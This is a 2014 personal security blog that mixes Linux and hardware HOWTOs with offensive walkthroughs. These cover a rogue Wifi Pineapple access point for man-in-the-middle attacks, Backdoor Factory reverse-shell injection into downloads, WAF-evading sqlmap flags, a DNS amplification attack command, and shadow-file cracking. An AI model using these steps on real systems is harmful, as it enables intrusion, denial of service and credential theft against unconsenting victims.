Friday, December 26, 2014

New Song from Offensive Security

Source : Happy Holidays from Offsec

That's all! See you.

Tuesday, December 23, 2014

HOWTO : Oracle Java 8 on Kali Linux 1.0.9a

For some reasons, you need to install Oracle Java 8 instead of the default OpenJDK 7 on Kali Linux.

nano java8

Add the following to the file and save.

echo "deb trusty main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src trusty main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp:// --recv-keys EEA14886
apt-get update
apt-get install oracle-java8-installer

Make the file executable.

chmod +x java8

Run it to install.


To uninstall.

apt-get --purge remove oracle-java8-installer

That's all! See you.

Wednesday, December 17, 2014

HOWTO : Flash Plugin on Kali Linux 1.0.9a


To install Flash :
apt-get install flashplugin-nonfree

To update Flash :
update-flashplugin-nonfree --install

Google Chrome

nano /etc/apt/sources.list

Append the following line :

deb wheezy-backports main contrib non-free

To install Flash :

apt-get update
apt-get -t wheezy-backports install pepperflashplugin-nonfree

Make sure to comment out the newly added repos after the install :

#deb wheezy-backports main contrib non-free

To update Flash :
update-pepperflashplugin-nonfree --install

That's all! See you.

Saturday, December 06, 2014

HOWTO : Fine Tune of iPad Mini 3 LTE

Personal Hotspot

By default, Personal Hotspot is hidden. You need to activate it by the following procedure :

(a) Settings - Cellular Data - Personal Hotspot - APN Settings - Personal Hotspot

(b) Enter some information at APN, Username and Password. Those information is not required to be real data.

(c) Exit and return, you will find Personal Hotspot option on the menu.

Cellular Data and Wifi Connection Timeout

(a) Settings - Touch ID & Passcode

(b) Enable iPad Unlock, Enable Require Passcode

(c) Settings - General - Auto-Lock

(d) Set to Never. If you cannot find "Never", you need to go to Settings - General - Reset - Reset All Settings.

(e) Enable Lock/Unlock

The internet connection will not be timeout or disconnected even you close the smartcase cover, unless you quit the application.

Make sure your MacBook Air's Energy Saving setting is set to "Never" when it is using battery. Meanwhile, the Energy Saving setting is set to prevent computer sleeping when using power adapter. However, I encounter some problem when connecting the shared wifi. I think we should wait for the release of 10.10.2 for the wifi fix.

In addition, the Personal Hotspot share with Bluetooth is awesome. It is stable and fast but with the distance limitation. It is the alternative of the wifi share at the moment.

That's all! See you.

Friday, December 05, 2014

HOWTO : Sandboxing Firefox on Mac OS X Yosemite (10.10.1)

Step 1 :

Go to the Apple Apps Store to install the current version of XCode if you do not have it installed.

Step 2 :

Install Homebrew if you do not have it installed.

sudo ruby -e "$(curl -fsSL"

To test the install if it is success or not :

brew doctor

Step 3 :

Install git if you do not have it installed.

brew install git

Step 4 :

cd /Users/Shared/

sudo git clone

Step 5 :

cd /Applications/
sudo mv firefox-bin firefox-bin.real
sudo ln -sf /Users/Shared/macos-sandbox-profiles/bin/firefox-bin .

Step 6 :

Quit the Firefox if it is still running (not just close the browser) and then restart it.

That's all! See you.

Thursday, December 04, 2014

HOWTO : ArpON on Kali Linux 1.0.9a

ArpON (ARP handler inspection) is a portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. It blocks also the derived attacks by it, which Sniffing, Hijacking, Injection, Filtering & co attacks for more complex derived attacks, as: DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

Step 1 :

apt-get update
apt-get install arpon

Step 2 :

nano /etc/default/arpon

Uncomment the DARPI and RUN, makes it looking as :

DAEMON_OPTS='-q -f /var/log/arpon/arpon.log -g -d"

Step 3 :

Reboot your Kali Linux.


ArpON - ARP Handler Inspection
Protect you from being ARP spoofing

That's all! See you.

HOWTO : ArpON on Mac OSX Yosemite (10.10.1)

ArpON (ARP handler inspection) is a portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. It blocks also the derived attacks by it, which Sniffing, Hijacking, Injection, Filtering & co attacks for more complex derived attacks, as: DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

Step 1 :

Go to the Apple Apps Store to install the current version of XCode if you do not have it installed.

Step 2 :

Install Homebrew if you do not have it installed.

sudo ruby -e "$(curl -fsSL"

Step 3 :

To test the install if it is success or not :

brew doctor

Step 4 :

brew install git
brew install cmake
brew install libdnet
brew install libnet

brew link libdnet

Step 5 :

cd ~
sudo git clone git:// arpon

sudo -sH
cd arpon
mkdir build
cd build
make install


Step 6 :

cd ~
nano arpon_startup

/usr/sbin/arpon -i en0 -D -q

chmod +x arpon_startup

Step 7 :

sudo nano /System/Library/LaunchDaemons/org.arpon.startup.plist

*** Please note that where "samiux" is my username, change to your username accordingly.

Step 8 :

Reboot your Mac.


ArpON - ARP Handler Inspection
Installing Homebrew on OS X Yosemite 10.10, Package Manager for Unix Apps
Protect you from being ARP spoofing

That's all! See you.

Tuesday, November 04, 2014

Blueberry - The Wifi Pineapple Mark V

REMARKS : When Kali Linux Nethunter is out, Wifi Pineapple is worthless except for the cheaper price.



(1) TP-Link TL-MR3020 ver. 1.x (ver. 1.9 at the time of this writing)
(2) SanDisk Cruzer Fit USB Flash Drive (8GB)


(1) OpenWrt
(2) Wifi Pineapple firmware
(3) Kali Linux 1.0.9a or Ubuntu Desktop 14.04 LTS

Wifi Pineapple is created by Hak5. It is a quite expensive device ($99.99-USD at the time of this writing). It is also named as Jasager (in German). The meaning in English is "Yes Man".

Wifi Pineapple is the Rouge Wifi Access Point (AP) to answer “Yes” to all Wifi probe requests by mobile devices. When a Wifi client is looking for an open SSID (no matter the SSID is) in Macdonald's Restaurant or in a cafe shop, the Pineapple (or Jasager) will reply “That’s Me!”. Once victims' mobile devices connected to Wifi Pineapple, you can carry out Man-in-the-Middle attack against the victims.

Now, we are going to make your Wifi Pineapple in less than $25-USD (TP-Link TL-MR3020 is about $20-USD while SanDisk Cruzer Fit USB Flash Drive is about $5-USD) and in a very easy way.

Step 1 :

To download the OpenWRT (Attitude Adjustment 12.09 - at this time of writing) :

If you are fresh install from the stock version of the TP-Link TL-MR3020 -

If you are upgrade from the previous installed OpenWRT -

Configure your computer to static IP address :

IP address :
Gateway :

Connect the TL-MR3020 to your computer with cable. The default IP address of stock TP-Link TL-MR3020 is Then browse to the stock IP address.

The username and password of the stock TP-Link TL-MR3020 are both "admin".

Go to the "System Tools" -- "Firmware Upgrade" to upgrade from the just downloaded .bin file.

Step 2 :

Once upgraded to OpenWRT, your device's IP address will changed to

Configure your computer to static IP address :

IP address :
Gateway :

Then set the very STRONG root password at "System" -- "Administration".

Go to "System" -- "System" to set the timezone.

To enable wireless at "Network" -- "Wifi".

To enable DHCP at "Network" - "Interfaces" - "Edit" - select "DHCP Client" and select "OpenWrt" by clicking "Switch Protocol". If you take too much time to re-load the page, it is fine. It is because the IP address cannot be get. Just go ahead.

Now, connect your TL-MR3020 with ethernet cable to the internet. Then, connect your computer to the TL-MR3020 via wifi and the SSID is "OpenWrt". Make sure you can access to the internet.

Once you get the IP address, such as, you can connect to the TL-MR3020 via ssh.

ssh -lroot

Enter your just created very STRONG root password.

Install the following packages :

opkg update
opkg install kmod-usb-storage
opkg install kmod-fs-ext4
opkg install block-mount

Step 3 :

Format your USB pendrive (8GB) as ext4 and swap, e.g. 2GB for swap (sda1) and 6GB for ext4 (sda2).

Then insert the USB pendrive to the TL-MR3020. Execute the following command line by line.

mkdir -p /mnt/sda2
mount /dev/sda2 /mnt/sda2
mkdir -p /tmp/cproot
mount --bind / /tmp/cproot
tar -C /tmp/cproot -cvf - . | tar -C /mnt/sda2 -xf -
umount /tmp/cproot
umount /mnt/sda2

Step 4 :

/etc/init.d/fstab enable
/etc/init.d/fstab start

vi /etc/config/fstab

Change the content as the following :

config mount
        option target /
        option device /dev/sda2
        option fstype ext4
        option options rw,sync
        option enabled 1
        option enabled_fsck 0

config swap
        option device /dev/sda1
        option enabled 1

The following is the command for the vi if you do not familiar with vi :

i - go to the insert mode and ready for edit
Esc - exit from insert mode
:w - write the changes to the file
:q - quit the vi

Then type the following command to reboot the device :


Once it boot up again, you login to it via ssh.

To check if the USB pendrive is mounted as "/" or not :


Step 5 :

Turn off the TL-MR3020 and take the USB Pendrive out from the TL-MR3020 and insert to your computer.

Back up the USB Pendrive to your computer.

mkdir mr3020
sudo cp -R /media/1234....1123/* ~/mr3020/
sudo cp -R ~/mr3020/lib ~/mr3020/lib-original

*** Where /media/1234....1123/ is different from yours.

You also need to make a backup of the /lib directory.

Do not take out the USB Pendrive from your computer.

Step 6 (Pineapple firmware installation):

Download the upgrade package of Pineapple (upgrade-2.0.4.bin at the time of this writing) to your computer, such as Kali Linux or Ubuntu :

wget -O upgrade-2.0.4.bin

When using Ubuntu, you should issue "sudo". However, Kali Linux does not required.

Install firmware-mod-kit on your Kali Linux or Ubuntu if you do not have it :

sudo apt-get install firmware-mod-kit
sudo /opt/firmware-mod-kit/trunk/ upgrade-2.0.4.bin
cd fmk/rootfs

Copy the requested directories to the USB Pendrive.

sudo cp -R bin/* /media/1234....1123/bin/
sudo cp -R sbin/* /media/1234....1123/sbin/
sudo cp -R usr/* /media/1234....1123/usr/
sudo cp -R etc/* /media/1234....1123/etc/
sudo cp -R www/* /media/1234....1123/www/
sudo cp -R pineapple /media/1234....1123/
sudo cp -R lib/firmware/* /media/1234....1123/lib/firmware/
sudo cp lib/* /media/1234....1123/lib/
sudo cp lib/wifi/* /media/1234....1123/lib/wifi/

sudo cp ~/mr3020/etc/config/fstab /media/1234....1123/etc/config/
sudo cp ~/mr3020/etc/passwd /media/1234....1123/etc/
sudo cp ~/mr3020/etc/shadow /media/1234....1123/etc/
sudo cp -R ~/mr3020/lib-original /media/1234....1123/

Step 6a :

To allow the victim to surf the internet via Pineapple, you need to change the DNS and Gateway at /etc/config/network from to Or, to change the DNS to

Step 7 :

Insert back the USB Pendrive to TL-MR3020.

Switch on TL-MR3020 and until it is booted up. Run "" script (at Step 8) at your computer. Browse the IP address that is showing on the screen. You will be asked to enter the password twice for the initial login. You should enter the previous STRONG root password.

Step 8 (Connectivity) :

The following is one of the ways to use the Pineapple (TL-MR3020) by the way of tethering :

Connect your laptop to internet via wireless or 3G.

Then connect the CAT5/5e/6 cable to the Pineapple and your laptop.

At the laptop, download the script.

chmod +x
sudo ./

Now, your computer (laptop) can access internet and also can access the TL-MR3020. Victims can also access the internet when they connected to your Pineapple.

Once you want to reset what set, you need to run the following script that is created by me.

sudo ./

When the TL-MR3020 is rebooted, you need to run again to get the access.

Important Note

There are THREE important things you should NOT do, otherwise, you will brick the TL-MR3020. They are :

First - Do NOT upgrade the OpenWrt from the web interface as the USB pendrive will not be mounted. Unless, you install the related packages again as above stated.

Second - Do NOT upgrade the Pineapple in the normal way (that is via the web UI or Pineapple). Make sure keep away from the /lib directory. Or, if you have a backup, you can copy the /lib directory back.

Third - Do NOT long press the "WPS/Reset" button on the TL-MR3020; otherwise, the OpenWrt will be reset and the USB pendrive cannot be mounted. Unless, you install the related packages again as above stated.


Victims need to had connected to any open wifi before; otherwise, Karma will not work.

Make sure the TL-MR3020 is version 1.x, other versions may brick the TL-MR3020.

The ONLY way to upgrade the Pineapple firmware is by following Step 6. In addition, you can upgrade from Mark IV (by this tutorial) to Mark V by following the Step 6 only.

Some infusions may not working on Blueberry as it is not the original one. For example, (1) the WPS infusion does not work as designed on Blueberry as it has only one wifi card. You cannot provide the internet connection to the victims and conduct WPS hacking at the same time. (2) The PineAP and Reconnaissance on AP & Client do not work as designed on Blueberry as it has only one wifi card too.

Know Issues

The external Wifi Dongle, such as Realtek 8187L does not work even the driver is installed and loaded. The limitation of Blueberry is that it cannot provide internet access to the victims and doing the attacks at the same time (for some of the attacks), such as WPS attacks.

It is still a good try to the Blueberry before you considering to purchase an original Wifi Pineapple Mark V.


Wifi Pineapple Mark V -
Pineapple Mark V WiKi
Pineapple Forums
PhiberOptics Youtube
Code injection to the downloading binaries

Wifi Pineapple Mark IV -
The beginners guide to breaking website security with nothing more than a Pineapple
Getting Started with the Wi-Fi Pineapple IV (Video)
Security4Plus Youtube Channel (Video)
How To: Configure a WiFi Pineapple For Use With Mac OS X (Video)
The Wifi Pineapple Book - Free Download
WiFi Pineapple – First Impression
You just can't trust wireless: covertly hijacking wifi and stealing passwords using sslstrip
All about WiFi Pineapple (Video)

That's all! See you.

Tuesday, October 28, 2014

Do Not Trust Your Download Even It Is From The Trusted Source

Joshua Pitts developed a tool suite for injecting backdoor to executable files of Windows, Linux and Mac OSX as well as FreeBSD. The process is fully automatically even you do not know what code cave is.

The tool suite is namely The Backdoor Factory and it also comes with a proxy to inject the backdoor while the victim is downloading the binaries - BDFProxy. The BDFProxy is working for HTTP protocol only.

Joshua Pitts discovers that one of the Tor Network Exit Nodes doing code injection to the binaries which are downloaded by victims via Tor network. His blog is showing how it will be and the interview report is talking about that.

How to install BDFactory on Kali Linux 1.0.9a?

BDFactory is working very well with Metasploit Framework.

apt-get update
apt-get dist-upgrade
apt-get autoclean
apt-get --purge autoremove

apt-get install python-pip

Install BDFactory :

cd ~
git clone
cd the-backdoor-factory

To update :

Install BDFProxy :

cd ~
git clone
cd BDFProxy

To update :

Usage of BDFactory :

./ -f psexec.exe -H -P 8080 -s reverse_shell_tcp

Usage of BDFProxy :

nano bdfproxy.cfg

*change the settings when necessary


msfconsole -r bdfproxy_msf_resource.rc

*if you are working with Pineapple, you need run ./ to configure your environment


Don't trust your downloaded binary even it is downloaded from the trusted source when it is delievered via HTTP. Meanwhile, please download binaries in Tor network with care.

Please DO NOT use this tool suite for illegal purpose; otherwise, you will be put into the jail.


Evasion of Anti-Virus with Veil Framework and The Backdoor Factory
Transparently proxify virtual machines
Transparent Proxy (Linux)
Framework for Man-In-The-Middle Attack
HOWTO : Protect You From Being ARP Spoofing

That's all! See you.

Thursday, October 16, 2014

VULNERABLE : Poodle SSLv3 Vulnerability

What is Poodle Vulnerability?

Google researchers have discovered a security vulnerability in SSL 3.0 that allows attackers to decrypt encrypted website connections. The details is in here.

However, some security experts disagree that the bug is particularly serious and they think that it only affect the public wifi.

How to exploit it?

Daniel Fox Franke wrote in his blog to explain how to exploit the vulnerability.

How to test the browsers vulnerability?

Qualys provides a tester online for the browsers testing. Or, you can try another tester online.

How to test the server vulnerability?

Qualys provides server test online for the server testing.

How to fix the browsers vulnerability?

There is a tutorial to show you how to fix them.

How to fix the common servers vulnerability?

There is a tutorial to show to you how to fix the vulnerability on common servers.

That's all! See you.

Thursday, October 02, 2014

HOWTO : CUDA with Kali Linux 1.0.9

The guide has been updated on FEB 4, 2015 as Kali Linux 1.0.9a includes the nVidia driver 340.x and CUDA 5.5.x.


CPU : Intel i7-3930K
Hard Drive : 3TB
Display Card : Two nVidia GeForce GTX 590

Install Kali

Install Kali Linux 1.0.9 on the box as usual. Make sure "secure boot" is disabled in your BIOS before installing. After that, you update the Kali accordingly.

apt-get update
apt-get dist-upgrade

Install nVidia Driver

apt-get install -y linux-headers-$(uname -r)
apt-get install nvidia-kernel-dkms nvidia-driver nvidia-cuda-toolkit nvidia-xconfig


sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub

Fix the nvidia_uvm error

After the reboot :

cd /usr/src/nvidia-current-331.67

cp Module.symvers uvm/
make -C uvm

cp uvm/nvidia-uvm.ko /lib/modules/`uname -r`/updates/dkms

Updated on Jan 8, 2015

Remark : If you use backports version, the nvidia_uvm problem is fixed and the cudaHashcat 1.31 can be running without any problem. The backports version of nVidia driver is 340.65 and the version of CUDA driver is 5.5.22 at this time of writing.

echo "deb wheezy-backports main contrib non-free" >> /etc/apt/sources.list

apt-get update

apt-get install -t wheezy-backports nvidia-kernel-dkms nvidia-cuda-toolkit nvidia-driver nvidia-xconfig

If you have done the following steps, you are not required to re-do it again.


sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub

Install cudaHashcat

mkdir hacking
cd hacking


7za x cudaHashcat-1.30.7z


7za x cudaHashcat-1.31.7z

(Please noted that the current version 1.32 does not compatible to nVidia driver 340.x).

Test the cudaHashcat

cd /root/hacking/cudaHashcat-1.30/

cd /root/hacking/cudaHashcat-1.30/

cd /root/hacking/cudaHashcat-1.30/

Install John the Ripper

(Please note that the current version of john is john-1.80-jumbo-1.tar.gz)

apt-get install libssl-dev

cd hacking

tar -xvzf john-1.7.9-jumbo-7.tar.gz
cd john-1.7.9-jumbo-7/src

make clean linux-x86-64-cuda

** If your hashes or passwords are longer than 8 characters, you need to change the following before compiling the John.

cd john-1.7.9-jumbo-7/src
nano params.h

Then change from "8" to "18" or "20" and etc.


Test the John the Ripper

cd /root/hacking/john-1.7.9-jumbo-7/run

./john --device=0,1,2,3 --format=sha512crypt-cuda /etc/shadow

* since I have 4 GPUs, so the --device should be 4.

*** When you changed the CHARSET_LENGTH, you need to generate a new charset. Do it once only.

bunzip2 -d rockyou.txt.bz2
cp rockyou.txt /root/hacking/john-1.7.9-jumbo-7/run

cd /root/hacking/john-1.7.9-jumbo-7/run

cat rockyou.txt | sed 's/^/:/' > rockyou.pot

mv all.chr all.chr-original
mv alnum.chr alnum.chr-original
mv alpha.chr alpha.chr-original
mv digits.chr digits.chr-original
mv lanman.chr lanman.chr-original

./john --pot=rockyou.pot --make-charset=all.chr
./john --pot=rockyou.pot --make-charset=alnum.chr --external=filter_alnum
./john --pot=rockyou.pot --make-charset=alpha.chr --external=filter_alpha
./john --pot=rockyou.pot --make-charset=digits.chr --external=filter_digits
./john --pot=rockyou.pot --make-charset=lanman.chr --external=filter_lanman

Then your cracking command will be :

./john --pot=rockyou.pot --device=0,1,2,3 --format=sha512crypt-cuda /etc/shadow

Install and Test Cryptohaze

cd hacking
wget -O Cryptohaze-Linux_x64_1_31a.tar.bz2

tar xjvf Cryptohaze-Linux_x64_1_31a.tar.bz2

cd /root/hacking/Cryptohaze-Linux
./Cryptohaze-Multiforcer -h NTLM -c charsets/charsetall -f test_hashes/Hashes-NTLM-Full.txt

That's all! See you.

Wednesday, October 01, 2014

HOWTO : Uninstall a specific software/package in Kali Linux 1.0.9

Since I need to run Ollydbg for a while, I then installed Wine in Kali Linux. When I no longer require Ollydbg, I would like to uninstall Wine. However, there are a lot of dependencies for the Wine. When you uninstall Wine with the following command, you will uninstall a lot of software or packages that may be useful for you, such as Gnome.

apt-get --purge remove wine

A more safety way to uninstall Wine should be as the following :

dpkg --remove --force-depends wine-bin
dpkg --remove --force-depends wine

That's all! See you.

Sunday, September 28, 2014

Kali Linux Nexus NetHunter

The official site is here. The setup guide is here.

Kali Linux NetHunter HID Attack from Offensive Security on Vimeo.

A quick demonstration of the Kali Linux NetHunter HID attack (Teensy like), by Offensive Security.

Kali Linux NetHunter "Bad USB" MITM Attack from Offensive Security on Vimeo.

The Kali Linux NetHunter implementation of the "Bad USB" MITM attack as demonstrated by the guys from at BlackHat 2014.

That's all! See you.

Thursday, September 04, 2014


I am going to test ZOTAC ZBOX C1320 Nano Plus with Kali Linux 1.0.9 64bit.

CPU : Intel Celeron N2930 (Quad-core, 1.83GHz, up to 2.16GHz)
GPU : Intel HD Graphic
RAM : 1 x DDR3L-1333 SO-DIMM (2GB Included)
HDD : 1 x 2.5-inch SATA 3.0Gb/s (64GB SSD Included)
Ethernet : Realtek Gigabit LAN
Wireless : IEEE802.11ac Intel Wifi
Bluetooth : 4.0
Remarks : 1 x SD/SDHC/SDXC Card Reader, 1 x HDMI, 1 x DisplayPort, 1 x eSATA, 4 x USB 3.0, 2 x USB 2.0

You can select UEFI or BIOS when doing setup. You also can disable the Secure Boot.

It is no problem to boot up Kali Linux 1.0.9 64bit. However, the wifi is partially working. It detects the signal but cannot work. The bluetooth is malfunction too. 1080p MKV video cannot be played on default Kali Linux install. The CPU has no Hyper-Threading feature. However, this box can use standard DDR3 RAM up to 8GB. You are not required to use DDR3L RAM. Meanwhile, the sound card is quite good.

This box is working very well with VMWare Workstation 10.x (64-bit). The 64bit guest virtual machine is working properly.

The power consumption is between 13W and 20W.

I recommend this box as its low power consumption with high performance.

Update :

HD video playback with the following drivers. However, the chipset is too new and it cannot be loaded properly :

sudo apt-get install i965-va-driver libva-intel-vaapi-driver vainfo

That's all! See you.

Tuesday, August 19, 2014

HOWTO : SQLMap for Cloudflare protected sites

When you suspect your target site is vulnerable to SQLi and you find out that it is protected by Cloudflare, you can still to launch SQLMap against the target.

First of all, you need to make sure the target site is protected by Cloudflare, you can add "--identify-waf" or "--check-waf" to confirm. However, do not set "--thread=" larger than 1 as the target will give you "403 Forbidden" error. Once you get the "403 error", your IP address is banned. Therefore, you are required to consider to use proxy servers or TOR to access the target.

Secondary, you need to add "--tamper='between,randomcase,space2comment'" and "-v 3", if the target is confirmed being protected by Cloudflare. You may also consider to add "--random-agent" and "--tor" when necessary.

Finally, do not use Kali Linux provided SQLMap scripts as it has no "WAF" scripts pre-installed. You are better to download the latest version of SQLMap from the official site.

git clone

This hint can be applied to other WAFs, IDSs and IPSs, such as mod_security or other Cloudflare like service providers.

For example :

python -u "" --check-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor

That's all! See you.

Friday, July 18, 2014

Defense your Network and Servers

Intruders will conduct reconnaissance on your network and servers before performing the attack. After that, intruders will perform the attack based on the information in hand.

In my opinion, the best way to defense your network and servers from being attacked is to interfere with the intruders' reconnaissance. When intruders cannot get any valuable information, they cannot perform the attack properly.

Most of the intruders use automatic tools, such as vulnerability scanners, to perform the reconnaissance and they seldom do it manually as it is harder for them especially for web applications. However, a small portion of advanced intruders may do it manually.

Hiawatha, a secure and advanced web server, can be configured to block vulnerability scanners from scanning the web server. Since the vulnerability scanners do not work properly, intruders cannot get any valuable information on the web server in order to launch an attack.

Suricata, a high performance network IDS, IPS and network security monitoring engine, used with Emerging Threats rules can be configured to drop the packet of the vulnerability scanners from scanning.

Web Application Firewall (WAF) and Intrusion Detection/Prevention System (IDS/IPS) as well as firewall can be bypassed by some of the advanced intruders. Therefore, blocking the vulnerability scanners is one of the good ways to defense your network and server from being attacked.

That's all! See you.

Tuesday, July 15, 2014

Thursday, July 03, 2014

HOWTO : ECS LIVA Mini PC Kit on Ubuntu 14.04 LTS

ECS Liva Mini PC kit is the smallest x86 PC in the world so far. The BIOS is UEFI, so that only Ubuntu besides Windows 8.1 can be installed on it. I select to install with LVM.

You may need a powered USB hub to connect the keyboard and mouse as well as install device (such as USB DVD-ROM or USB pendrive). Since it comes with 32GB/64GB eMMC (SSD drive), you may required to connect to an external hard drive for more storage.

The maximum power consumption is about 12W under Ubuntu 14.04 LTS.

The sound and network device are working out of the box. However, the wireless and bluetooth devices do not work properly even you download the wireless driver from the official site (it is still beta at the moment).

After some tries and fails, I finally make the wireless device working. However, the bluetooth device does not work at the moment.

How I make the wireless device working? Here you are :

Step 1 :

Write down the MAC address of the wireless card.

Step 2 :

Download the beta driver from the official site. Extract it and go to ~/Downloads/Ubuntu/WLAN.

Rename the "brcmfmac-sdio.txt" to "brcmfmac-43241b4-sdio.txt".

mv brcmfmac-sdio.txt brcmfmac43241b4-sdio.txt

Change the "macaddr" at brcmfmac43241b4-sdio.txt to the previous written down MAC address.

e.g. macaddr=24:0a:64:4c:43:34

Step 3 :

Move the /lib/firmware/brcm directory to another place.

sudo mv /lib/firmware/brcm ~/Downloads/

Step 4 :

Install git package.

sudo apt-get install git

Download the wireless firmware.

cd ~/Downloads
git clone git://

After that copy the ~/Downloads/linux-firmware/brcm to /lib/firmware/.

sudo cp -R ~/Downloads/linux-firmware/brcm /lib/firmware/

Copy the brcmfmac43241b4-sdio.txt to /lib/firmware/brcm/.

sudo cp ~/Downloads/Ubuntu/WLAN/brcmfmac43241b4-sdio.txt /lib/firmware/brcm/

Step 5 :

Comment out the blacklist.

sudo nano /etc/modprobe.d/blacklist.conf

Locate "blacklist bcm43xx" and make it to "#blacklist bcm43xx".

Step 6 :

Reboot the box.

However, the wifi signal is not very strong indeed.


You may need to do some changing on the box with the following package :

sudo apt-get install libavcodec-extra
sudo apt-get install indicator-cpufreq

To increase the performance, you need to NOT to use SWAP.

sudon nano /etc/rc.local

Insert the following before "exit 0" :

sysctl -w vm.swappiness=0

Then, reboot your box.

For the video playback, you are required to install the following packages.

sudo add-apt-repository ppa:sander-vangrieken/vaapi
sudo apt-get update
sudo apt-get install mplayer-vaapi gstreamer1.0-vaapi gstreamer1.0-libav libva-intel-vaapi-driver vainfo mencoder-vaapi

That's all! See you.

Link : 10 things to do after installing Ubuntu


3rdman have an alternative way to fix the wifi problem.

Wednesday, July 02, 2014

Tsunami - DNS Amplification Attack Tool

Tsunami is a DNS Amplification Attack Tool which is collected from the internet and modified by Samiux. It is designed for testing your server and/or network under the DNS Amplification Attack. Perform this test on any server and/or network without authorization is a crime and you will be put into a jail.

The number of open recursive DNS servers and the bandwidth of the attacker as well as duration may affect the traffic volume size of the attack.

Tsunami is working perfectly on Kali Linux 1.0.7 or above. The official site is at here.


To perform DNS Amplification attack :

python -t -s open_dns.txt -a domain_name.txt -c -1 --verify -v --threads=1000

*where is the victim's IP address

To scan for the open recursive DNS server :

perl ' -' -q 1000

Remarks : this script just can check if the DNS server has the RA flag or not only. You need to double check with the following command to confirm the scanned DNS server is a true open recursive DNS server.

dig ANY

*where is the open recursive DNS server
where is the domain to lookup

Tsunami comes with the following files : - the attack script - the scanner script
gov-uk_domain.txt - domain names of UK Government
open_dns_1.0.0.0- - open recursive DNS list within and IP range

That's all! See you.

Sunday, June 29, 2014

HOWTO : Shellter on PE files

Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.

It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants and/or he chooses Basic Mode), adding an extra section with RWE access,and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application.

That's all! See you.

Saturday, June 28, 2014

HOWTO : The Mole on Kali Linux 1.0.7

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.


- Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
- Command line interface. Different commands trigger different actions.
- Auto-completion for commands, command arguments and database, table and columns names.
- Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
- Exploits SQL Injections through GET/POST/Cookie parameters.
- Developed in python 3.
- Exploits SQL Injections that return binary data.
- Powerful command interpreter to simplify its usage.


Quick start
Command Usage
Exploiting injections through POST/Cookies
Filters - bypassing IDS/IPS
Exploiting injections that return binary data
Writing custom filters


apt-get update
apt-get install themole

Run it

themole -h
themole -u "" -n "admin"

That's all! See you.

Saturday, June 14, 2014

HOWTO : Fix the half installed package in Kali Linux/Debian

I forgot to delete the Iceweasel on my Kali Linux before installing Firefox. The firefox installation is failed as expected. I removed the sources.list entry of the firefox and conducted "apt-get update". However, I got a message of "the package firefox-mozilla-build needs to be reinstalled, but I can't find an archive for it". The apt-get command does not work properly anymore.

Later, I fixed the problem by issuing the following commands :

sudo dpkg-reconfigure firefox-mozilla-build --force
sudo dpkg --purge --force-all firefox-mozilla-build

After that, I perform "sudo apt-get update", the error message gone.

That's all! See you.

Wednesday, June 11, 2014

sysdig and Attackers

When a system is compromised, attackers usually erase the syslog and other related log files in order to hide his/her intrusion activities.

Nowadays, attackers should also erase one more log file, namely sysdig. sysdig will log all the activities in a file, namely *.scap.gz. Sysadmin can backtrack all the activities of all users (including intruders).

For more details of sysdig, you can refer to Draios Blog - Fishing for Hackers: Analysis of a Linux Server Attack.

That's all! See you.

Sunday, June 01, 2014

Facebook Vulnerability - Name by Phone Number

ubugnu discovered a vulnerability in Facebook that you can search the users in the Facebook by random generated telephone numbers. He also developed a bash script to proof his concept. The script will find all the matching telephone numbers to the owners (Facebook users who have registered their telephone number in their accounts).

For details, please read the developer's GitHub page.

That's all! See you.


Facebook Vulnerability - Hidden Friends Crawler

Monday, May 19, 2014

Croissants - Intrusion Detection and Prevention System


In 2013, I joined the SmoothSec project and modified it to adopt to Intrusion Detection and Prevention System by using Suricata with AF_PACKET. Since SmoothSec 3.4 is developed on Debian 7 (Wheezy), the Linux kernel 3.2.x is too old for Suricata with AF_PACKET. I used the backport kernel to complete the task. However, it makes the system not so easy to maintain.

Meanwhile, the SmoothSec project seems to be dead. The core developer does not active in the project and IRC channel. Therefore, I make up my mind to create a new project namely "Croissants" based on the SmoothSec. Croissants is designed for Ubuntu Server LTS or higher (Long Team Support only) and targeted to work with Suricata on AF_PACKET only. It is an Open Source Project under GPLv3 License by Samiux.

Croissants is a bash script instead of a Linux distribution likes SmoothSec. It downloads and compiles as well as setup the applications almost automatically. It combines with Suricata (IDPS Engine), Snorby (Event Manager & Web Interface), Pigsty (Event Spooler) and Pulledpork (Rules Manager). It will use the latest verion of the software on every installation but the only drawback is requiring internet.


I am a long term user of Ubuntu since 2006 (Ubuntu 6.06). I find that Ubuntu uses newer packages and kernel. Ubuntu can be set to update the system automatically, although you can do it with cron job. It makes the system almost up-to-date in order to avoid some known vulnerabilities attack. Therefore, you can focus on your business and network security monitoring (NSM). Furthermore, Ubuntu is free forever according to the founder, Mark Richard Shuttleworth.

AF_PACKET can be running on a very low-end computer, such as Intel ATOM D2550. The performance of the AF_PACKET is very good under this CPU on my home network. I can watch 720p Youtube video without lagging on my network (10Mbit internet and Gigabit internal network with Untangle UTM and Croissants). The amount of RAM is 8GB on this default setup. However, home router will be lagged while watching 720p Youtube video. This poor performance should be caused by the home router.


Croissants (food) is delicious and common as well as cheap in price. I would like Intrusion Detection and Prevention System is common and cheap in price that everyone can affort.

